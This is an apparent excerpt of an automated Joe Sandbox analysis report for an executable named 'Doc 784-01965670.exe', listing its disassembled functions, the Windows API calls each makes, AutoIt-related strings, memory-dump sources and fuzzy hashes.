                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                    • String ID: AU3_FreeVar
                                                                                                                                    • API String ID: 2184576858-771828931
                                                                                                                                    • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                                    • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                    • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                                                                                    • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                    Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                                    • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                    • String ID: close all
                                                                                                                                    • API String ID: 4174999648-3243417748
                                                                                                                                    • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                                    • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                                    • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                                                                    • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                                    Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1291720006-3916222277
                                                                                                                                    • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                    • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                    • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                    • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                                    Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastselect
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 215497628-2761332787
                                                                                                                                    • Opcode ID: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                                    • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                                    • Opcode Fuzzy Hash: 8403caabb69194ab749b3558b6d17cf16ba223cf5fbe2e3d1d341ca8c1bfc534
                                                                                                                                    • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                                    Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                    • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                    • API String ID: 1729044348-3708979750
                                                                                                                                    • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                    • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                    • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                    • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                    Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                                    • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                                    • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                                    • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2326526234-1173974218
                                                                                                                                    • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                    • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                    • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                    • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                    Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                    • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                                    • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                                    • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                      • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                    • String ID: \
                                                                                                                                    • API String ID: 321622961-2967466578
                                                                                                                                    • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                                    • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                    • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                                                                                    • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                                    Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                    • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                                                                    • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                                    • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                                                                                    • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                                    Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                                                                    • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                                                                    • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                                                                    • _wcscat.LIBCMT ref: 00436FB2
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2903788889-0
                                                                                                                                    • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                                    • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                                                                                    • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                                                                                    • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                                                                                    Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                    • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                    • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                    • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                                    • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                    • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                                    Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00401257
                                                                                                                                      • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                                      • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                      • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                      • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                    • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1792922140-0
                                                                                                                                    • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                                    • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                                    • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                                                                                    • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                                    Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                    • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1925773019-0
                                                                                                                                    • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                    • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                    • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                    • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                    Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                                    • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                                    • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                                    • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                                    • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                                    • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                                    • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                                    • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                    • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                    • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                                    • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
